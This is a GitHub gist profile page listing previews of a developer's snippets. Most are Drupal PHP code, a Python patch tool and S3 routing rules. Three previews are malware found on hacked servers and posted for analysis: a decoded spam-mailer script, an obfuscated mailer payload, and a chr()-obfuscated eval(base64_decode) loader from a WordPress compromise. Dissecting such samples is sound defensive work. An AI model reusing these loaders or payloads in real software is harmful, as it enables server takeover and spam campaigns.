Skip to content

Instantly share code, notes, and snippets.

View bronius's full-sized avatar

Bronius Motekaitis bronius

View GitHub Profile
@bronius
bronius / detect-if-drupal-entity-delete-form.php
Last active December 12, 2019 03:21
Drupal 8 / PHP 7 - Thought I could devise a super-generic form of determining if this $form_state form is an entity delete form.
<?php
$is_delete_form = FALSE;
$classes = class_uses($form_state->getFormObject());
foreach ($classes as $class) {
if ($class === 'Drupal\Core\Entity\EntityDeleteFormTrait') {
$is_delete_form = TRUE;
break;
}
}
if ($is_delete_form) {
@bronius
bronius / gist:92393784768bc531eca95fb55f68d3d2
Last active June 25, 2018 19:18
Super fast replacement for field_encrypt_views_query_alter in contrib module https://www.drupal.org/project/field_encrypt_views_filters
<?php
// The original project query_alter takes each encrypted field with a value sought out of the query
// Executes a query of all other fields (or none if none)
// Creates a MySQL temporary table and populates with decrypted fields' values
// Adds that temp table as a join on the original View
// And then executes the view, letting MySQL query against that temporary table of decrypted values.
//
// This approach expects a parallel field, field_name_md5, to contain an md5 hash of the original,
// decrypted value (CRUD updated with entity/node hooks or as calculated field). At query execution,
@bronius
bronius / dpatch.py
Created April 18, 2017 14:42 — forked from nvahalik/dpatch.py
Drupal patch maker
#!/usr/local/bin/python
import json
import re
import urllib2
import subprocess
class Issue:
def __init__(self, number):
self.number = number
@bronius
bronius / Rewrite rules for Windows DDay with Click Once installer update over Amazon AWS S3 static web hosting
Created January 18, 2017 20:00
Running into issues with a .Net project's ability to pull its DDay deployed Click Once installer update files hosted on Amazon S3 static website due to mysterious 404. The original manifest was pulled, and the app prompts to download update, but the update failed with 404. Turns out the subsequent requests made with superfluous forward slash ("/…
<RoutingRules>
<RoutingRule>
<Condition>
<KeyPrefixEquals>//</KeyPrefixEquals>
</Condition>
<Redirect>
<ReplaceKeyPrefixWith>/</ReplaceKeyPrefixWith>
</Redirect>
</RoutingRule>
</RoutingRules>
@bronius
bronius / search.php
Last active January 27, 2016 05:18
Translated from https://gist.github.com/bronius/5328431878e564bbc29a. The decoded output that gets run in an eval() in this nasty spammer script on my hijacked server. It looks like it gets called by remote spambots, but not yet sure what the request payload is to make it tick.
<?php
// Note this is the result of a var_dump, so you should see two lines like:
// string(109877) "
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
if(isset($_SERVER))
{
@bronius
bronius / search.php
Last active January 27, 2016 04:54
Translation at https://gist.github.com/bronius/7d1fada81be055fde636. Another nasty script. It is an obfuscated bunch of garbled gibberish which translates itself and then, in an eval(), acts as a pretty sophisticated, smtp-authenticated spam emailer. Here's the original source as found in a file on a VPS I manage (same cPanel account as before..…
<?php
// Look at the bottom of this script. What was an eval() I've put into a var_dump() so you can see the script this contains
// Copy/paste this in its entirety (minus the opening ?php tag) at http://sandbox.onlinephpfunctions.com/, and you
// will see the resulting code without it executing anything malicious.
function ntjmfak($ixdtwpth, $anmcarey){$qq = ''; for($i=0; $i < strlen($ixdtwpth); $i++){$qq .= isset($anmcarey[$ixdtwpth[$i]]) ? $anmcarey[$ixdtwpth[$i]] : $ixdtwpth[$i];}
$rzqwohzj="base64_decode";return $rzqwohzj($qq);}
$efl = 'YGyrI01f7pYts80KdV1Kp83W7Kd6bUz0nULqTLqPIkzqpvJySjQHAG1Hp80KdV1KdKd6bRPqTLqPIkzqpvJySjQH'.
'AkM5p8057kJZSGyWAy1aIkZysKLQ9jNwjNif7pelSGyh7016IkZqSjQLCn6CjVyVCGyfd80aCjelFa0E0N0ECENCOLtssM1ne0sk'.
@bronius
bronius / post.php
Last active November 11, 2015 02:45
A nefarious script found on a WordPress site. It's obfuscated at least a couple layers deep. In your access_log you should see POST /post.php, and your themes' header.php files will get a little javascript injected which appears to just make a call out to some remote websites. How is this good for anyone? Please give it a whirl at http://sandbox…
// Found this in a post.php in a hacked WordPress site. Just wanting to see how this evaluates.
$sDo80i4="p".chr(114)."e".chr(103).chr(95)."\x72".chr(101)."\x70".chr(108)."a\x63\x65";
$xm3MTJ="\x65v\x61".chr(108)."(\x62".chr(97).chr(115).chr(101).chr(54)."4\x5F\x64\x65c\x6Fd".chr(101)."\x28".chr(34)."\x51GVy".chr(99)."\x6d9\x79".chr(88).chr(51)."\x4a\x6c\x63\x47\x39\x79\x64".chr(71).chr(108)."\x75\x5a".chr(121)."gw".chr(75)."T\x73\x4e".chr(67).chr(107)."\x42\x70\x62m\x6c".chr(102)."\x632".chr(86)."\x30K".chr(67).chr(74).chr(107).chr(97).chr(88)."N\x77b".chr(71).chr(70).chr(53)."\x58\x32".chr(86)."\x79\x63".chr(109)."9\x79\x63yI\x73M".chr(67)."k\x37".chr(68)."\x51\x70\x41\x61\x575\x70X".chr(51)."N\x6cdC\x67ib".chr(71)."\x39".chr(110)."\x58".chr(50)."\x56y\x63m".chr(57).chr(121)."\x63".chr(121)."IsM".chr(67)."k".chr(55)."\x44Q\x70\x41".chr(97).chr(87)."\x35".chr(112)."X\x33".chr(78)."\x6c".chr(100)."\x43g\x69\x5a".chr(88)."J".chr(121)."b3".chr(74)."\x66\x62\x47".chr(57).chr(110)."\x49\x69ww\x4b\x54s\x4E\x43\x67
@bronius
bronius / megaselect.module
Created February 10, 2014 19:33
Attempt to nest Drupal 7 FAPI element type tableselect (Note: It doesn't work!)
<?php
/**
* @file megaselect.module
* TODO: Enter file description here.
*/
/**
* Implements hook_menu().
*/
@bronius
bronius / gist:6371145
Last active December 21, 2015 21:49 — forked from neclimdul/gist:6370758
One way around Drupal 7 Ubercart 7.x-3.5 cache anonymous cart (in IE?). I found that 'cart' was always getting added to Drupal's cache_page table. Doesn't it make sense that it *not*? In fact, it broke checkout for our anonymous users. Try it out, let me know if it works for you. Thanks @neclimdul! Note: the fix is just the 'cart' -> drupal_page…
/**
* Implements hook_init().
*/
function uc_cart_init() {
global $conf;
$conf['i18n_variables'][] = 'uc_cart_breadcrumb_text';
$conf['i18n_variables'][] = 'uc_cart_help_text';
$conf['i18n_variables'][] = 'uc_continue_shopping_text';
// Don't cache any cart of checkout pages.